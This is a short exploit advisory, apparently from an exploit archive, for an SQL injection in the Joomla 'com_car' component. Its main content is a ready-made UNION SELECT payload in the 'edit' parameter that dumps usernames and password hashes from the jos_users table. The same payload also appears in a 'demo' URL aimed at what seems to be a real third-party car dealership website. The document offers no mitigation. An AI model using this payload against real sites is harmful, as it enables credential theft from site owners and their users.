The Joomla Car component suffers from a remote SQL injection vulnerability.
133484801b0048d2d49478dd762a8492b07159c7a712540456c811e525e041e1
###############################################################
# #
# Joomla component 'com_car' SQL injection vulnerability #
###############################################################
# ####### #
# #
# xploited by k1ll3r_null #
# #
# contact: k1ll3r.null@gmail.com #
###############################################################
+++++++ greetz to all p0wnbox.com members !!! +++++++
--------------------------------------------------------------------------------------
Vulnerable joomla component : com_car
vulnerable parameter: "edit" ($_GET)
-------------------------------------------------------------------------------------------------------------------------
Exploit :
http://www.site.com/index.php?option=com_car&edit=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),password),14,15,16,17,concat(username,char(58),password),19,20,21,22,23,24+from+jos_users--
View demo :
http://www.pandisciautomobili.com/index.php?option=com_car&edit=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,char(58),password),14,15,16,17,concat(username,char(58),password),19,20,21,22,23,24+from+jos_users--
--------------------------------------------------------------------------------------------------------------------------